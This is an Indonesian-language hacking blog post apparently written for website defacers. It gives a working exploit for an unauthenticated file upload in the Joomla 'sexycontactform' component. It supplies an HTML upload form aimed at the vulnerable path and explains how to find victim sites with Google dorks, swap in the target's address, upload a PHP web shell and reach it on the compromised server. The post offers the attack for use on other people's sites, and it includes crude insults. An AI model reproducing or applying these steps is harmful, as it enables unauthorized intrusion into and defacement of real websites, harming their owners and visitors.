Oke kali ini mau berbagi exploit yang ane dapet kemaren. Sebenernya masih banyak target perawan sih, tapi berhubung ane mau berhenti dari dunia persilatan ini, wkwkwk . Ane share aja deh tutornya. Semoga bermanfaat bagi yang masih doyan deface.
Oke, pertama, siapin dulu html exploiter nya.
<form method=”POST” action=”http://localhost/components/com_sexycontactform//fileupload/index.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
Simpan dengan format .html
Lalu dorking di google.
Dork : ??
Use ur brain, bitch !!
Victim nya di :
http://localhost/components/com_sexycontactform//fileupload/index.php
kalo udah nemu target , edit html explot nya tadi. ganti http://localhost dengan situs target.
lalu buka file html tadi dengan browser.
ada form upload. Upload shell lewat situ.
Kalo ada semacam notice gak jelas kek jembut gitu tandanya shell sukses di upload.
Shell ada di http://localhost/components/com_sexycontactform//fileupload/files/shell.php
Sekian tutor kali ini, semoga bermanfaat .
Happy Hacking ^_^
Leave a Reply